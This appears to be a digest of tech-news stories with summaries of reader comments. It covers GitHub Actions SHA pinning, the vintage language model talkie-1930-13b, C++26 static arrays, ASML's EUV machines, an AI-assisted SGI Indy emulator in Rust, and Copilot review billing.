Comments: Users broadly endorse SHA pinning over mutable tags, with many feeling vindicated by recent incidents and urging immediate hash-pinning especially for third-party actions. Several developers criticize YAML as an inadequate CI environment, calling for a proper debuggable scripting language. Tools cited as mitigations include ratchet (automated SHA pinning), zizmor (static analysis), and hasp — a runtime sandbox using Rust, landlock, seccomp, and eBPF to enforce pinning and broker tokens without Docker. Dagger is mentioned as an alternative platform enabling local CI execution. Some users report migrating orchestration to Buildkite while retaining GitHub only for repository hosting. The pull_request_target trigger is characterized by some as having no legitimate use that outweighs its risk. Others note OIDC runner identities are configured once and rarely revisited during incidents. GitHub Actions performance degradation, partly attributed to wide Copilot review rollout, prompts some to consider returning to self-hosted Jenkins. The timing of a concurrent GitHub Actions outage is noted as ironic. Concerns about platform consolidation under Microsoft ownership surface as well.

Researchers introduce talkie-1930-13b, a 13B LM trained on 260B tokens of pre-1931 English text—books, newspapers, patents, journals, case law—to study generalization free from modern contamination. Vintage LMs enable testing whether models predict post-cutoff events, independently derive later discoveries like General Relativity, or learn Python from in-context examples without code in training data. The model underperforms a FineWeb-trained twin on benchmarks, largely due to OCR noise—conventional OCR yields 30% of human-transcribed performance, improving to 70% with regex cleaning. Post-training used historical texts (etiquette manuals, cookbooks, encyclopedias) for instruction pairs, then direct preference optimization with Claude as judge, raising instruction-following from 2.0 to 3.4 out of 5. Despite n-gram anachronism filtering, the model retains WWII and postwar knowledge, indicating incomplete leakage removal. The team plans GPT-3-scale training this summer, a trillion-token multilingual corpus, and a bespoke vintage OCR system. Alec Radford, key to the original GPT models, is among the authors.

Comments: Users find the model entertaining but unreliable: it opens sentences accurately then drifts into confident nonsense—crediting Edison a 125 MPH car, mangling Ohm's law, misidentifying Ambrose Bierce's birthplace and Civil War allegiance. The pre-1931 definition of "computer" as a human occupation and the model's confidence no major European war looms in 1930 draw amusement. The Civil War exchange—where the model denies slavery as a cause—provokes dry commentary. Critics argue the post-training pipeline using Claude as judge undermined the contamination-free premise, and someone on X identified apparent post-cutoff data leaks. A key observation: the entire training corpus is public domain, making talkie unusually copyright-unencumbered. Users request Ollama support, period-accurate TTS, and mobile compatibility. The model's confident wrong predictions—universal peace by 2025, India still British in 2026—underscore the warning not to ask it questions you cannot verify. Some note its 1930s social views on gender and race reflect the era's dominant voices, raising questions about whose perspectives shaped the corpus.

C++26's std::define_static_array simplifies the "constexpr two-step" — a workaround needed because constexpr heap allocations can't persist to runtime, barring constinit std::vector globals. The two-step calls a constexpr function twice to get the size, then populate a std::array. define_static_array instead emits a constexpr range as a span<const T> directly into the object file, which is cleaner and more compile-time-efficient. However, it has four limitations over the two-step: it requires structural types (excluding optional, string, span); it can't store pointers to string literals since those aren't valid template arguments; it can't work with move-only types since NTTPs must be copyable; and it only produces const rodata, making mutable static arrays impossible. Array objects from define_static_array are permitted but not required to be coalesced across different element types. Barry Revzin's P3380R1 could resolve the first three by expanding NTTP support to user-annotated types, though with arcane syntax. The author anticipates a future code-generation reflection facility to more fully supersede the two-step.

Comments: Users draw a sharp contrast with D, where immutable int[] aaa = f() compiles directly and lands in the object file's data section with no ceremony. The general reaction is that the complexity is "on-brand for C++," with readers left to decide whether that's a feature or flaw. The "compiler's imagination" metaphor earns praise as an unusually clear explanation, though one commenter notes it makes them want an AI harness around the compiler to reduce the cognitive overhead of experimenting with constexpr and std::execution. A question is raised about whether PMR (polymorphic memory resource) STL variants could offer a solution, with the compiler mapping ranges into a read-only section. Another seeks clarification on the underlying motivation — whether the goal is simply to bake data into compiled binaries so it's already resident in memory at runtime. The thread closes with pointed criticism that C++ practitioners excel at manufacturing problems and then devising elaborate solutions, questioning whether the effort is ultimately productive.

ASML (spun from Philips in 1984) monopolizes EUV lithography, the only process enabling sub-5nm chip production, with machines priced above $120M and a $400B+ market cap. EUV uses laser pulses on falling tin droplets to generate 13.5nm plasma light, reflected via ultra-precise mirrors to print 3nm-scale features onto silicon wafers. Modular outsourced design enabled fast repairs; US DOE EUV LLC membership and the 2001 acquisition of Silicon Valley Group cemented ASML's IP lead over Nikon and Canon. ASML defeated Nikon's 157nm dry approach via immersion lithography (water-bent 193nm light) and the TWINSCAN dual-stage architecture that eliminated idle machine time. In 2012, ASML sold 23% equity to Intel, TSMC, and Samsung, acquired light-source maker Cymer for $2.5B, and working as "one team" with TSMC achieved 500 wafers/day throughput, enabling commercial EUV by 2019. Decades of tacit knowledge embedded across 5,000+ suppliers — including optics firm Zeiss and laser maker Trumpf — makes replication nearly impossible; China's systematic hiring of former ASML engineers has not closed the gap.

Comments: Commenters argue ASML's edge reflects cumulative optimization across thousands of simultaneous steps rather than any single breakthrough — analogized to a high-performing quant fund whose advantage lies in operational refinement, not secret techniques. Several challenge the "world's most complex machine" claim, citing the Space Shuttle, LHC (Guinness record holder), ISS, and the power grid; one argues Zeiss — which grinds irreplaceable mirrors and cannot easily scale — is the true chokepoint. China's use of older DUV multi-patterning to work around export controls is flagged as significant. Silicon purity requirements have tightened to below 1 part per billion, and chip node names now diverge substantially from physical feature sizes. Recommended resources include Chris Miller's Chip War, the Veritasium EUV video, Asianometry's YouTube channel, and the Omega Tau podcast. Some view extreme machine complexity as evidence EUV is not yet mastered and predict future simplification, while others consider China eventually developing competing technology inevitable.

Dominik Behr built an SGI Indy (MIPS R4400) emulator in Rust with heavy AI assistance from Claude and Gemini, framing it as an experiment in "vibe coding." The emulator boots both IRIX 6.5 and 5.3 to multiuser mode with working networking (ping, telnet, ftp), X11/Newport REX3 graphics, and mouse/keyboard input via PS/2 emulation. A three-tier Cranelift-based JIT compiler translates MIPS basic blocks to native x86_64, progressing from ALU-only through loads to full store support based on execution frequency, with hot block profiles persisting across sessions. A separate REX3 graphics JIT compiles specialized per-DrawMode "shaders" for the draw pipeline in the background. Copy-on-write disk overlay protects the base image from corruption during development. Known limitations include failures with old Gentoo MIPS liveCDs and NetBSD hanging on a white screen. The project requires a raw IRIX 6.5.22 disk image (convertible from the MAME IRIX image) and optionally an Indy PROM binary. A rules/ directory documents hard-won JIT and IRIX debugging lessons intended for both humans and AI assistants. The project is BSD 3-Clause licensed and accepts bug reports and merge requests.

Comments: Comments are sparse: one user flags that the project was already posted to Hacker News 26 days prior, questioning its eligibility as a fresh Show HN submission. Another user expresses curiosity about the output of IRIX's hardware inventory command (hinv), noting they want to dig out their old IRIX CDs to compare. A third simply calls it "very cool." There is no substantive technical discussion in the comments.

GitHub Copilot code reviews will begin consuming GitHub Actions minutes on private repositories starting June 1, 2026, while public repos remain unaffected. The change stems from Copilot's agentic tool-calling architecture running on GitHub-hosted runners, triggering dual billing: Actions minutes drawn from existing plan entitlements plus AI Credits under a new usage-based model. This affects Copilot Pro, Pro+, Business, and Enterprise plans, including reviews from non-licensed users billed via direct org billing. Until June 1, reviews draw only from premium request unit (PRU) allowances and no Actions minutes are charged. GitHub recommends billing managers review current Actions usage, confirm budget and spending limits, and monitor consumption via Copilot metrics, Actions metrics, and Billing Usage Reports. No additional runner setup is required if GitHub-hosted runners are already enabled, and self-hosted runners remain an option. Organizations can set budgets to cap Actions spending beyond included plan entitlements.

Comments: Commenters view this as part of an industry-wide shift away from VC-subsidized AI pricing toward cost recovery, predicting competitors will follow once volume peaks. Several argue Copilot has long been the weakest mainstream AI coding tool — inferior to Cursor, Windsurf, and Claude Code — making the price hike self-defeating; one compares it to "the Windows Phone of AI coding assistants." The dual billing of AI Credits and Actions minutes is criticized as confusing obfuscation that makes actual costs hard to trace, and users question why non-Actions activity should consume Actions budgets at all. The agentic model reportedly doubled review turnaround time, and the absence of per-review minute data is flagged as a problem for teams running 20+ PRs daily. Some are migrating off GitHub but find no strong alternative, citing GitLab, Codeberg, Sourcehut, and Bitbucket as each lacking. Others recommend local models as cheaper, and CI/CD minute exhaustion is raised as a related pain point for solo developers.